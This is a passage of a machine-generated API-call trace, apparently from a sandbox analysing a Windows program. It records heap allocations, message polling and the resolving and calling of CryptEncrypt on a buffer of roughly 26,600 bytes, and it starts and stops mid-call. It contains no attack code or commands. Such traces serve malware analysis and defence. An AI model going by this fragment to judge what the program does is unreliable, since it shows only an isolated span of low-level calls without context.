(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0233.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0233.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0233.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0233.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0233.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0233.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0233.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0233.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0233.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0233.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0233.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0233.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0233.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0233.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0233.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0233.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0233.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0233.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0233.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0233.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0233.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0233.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0233.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0233.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0233.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0233.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0233.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0233.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0233.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0233.551] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0233.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0233.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0233.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0233.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0233.552] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0233.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0233.552] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0233.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0233.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0233.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0233.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0233.552] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0233.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0233.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0233.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0233.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0233.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0233.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0233.552] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0233.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0233.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0233.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0233.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0233.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0233.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0233.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0233.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0233.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0233.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0233.553] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0233.553] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0233.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0233.553] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0233.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0233.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0233.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0233.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0233.554] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0233.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0233.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0233.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0233.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.554] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0233.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0233.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0233.554] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0233.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0233.555] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0233.555] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0233.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0233.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0233.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0233.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0233.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0233.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0233.555] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0233.555] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0233.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0233.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0233.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04498 [0233.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0233.555] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0233.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0233.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0233.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0233.556] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0233.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0233.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0233.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0233.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0233.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0233.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0233.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0233.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0233.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0233.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0233.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0233.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0233.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0233.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0233.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0233.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0233.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0233.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0233.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0233.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0233.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0233.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0233.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0233.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0233.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0233.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0233.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0233.559] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0233.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0233.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e515b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0233.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0233.560] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0233.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0233.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.560] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x67e3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x67e8) returned 1 [0233.560] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.561] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0233.561] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.561] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.561] CharLowerBuffW (in: lpsz="byte[26600]", cchLength=0xb | out: lpsz="byte[26600]") returned 0xb [0233.561] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.562] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0233.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0233.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0233.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0233.562] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0233.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0233.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0233.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0233.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0233.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0233.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0233.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.563] RtlAllocateHeap 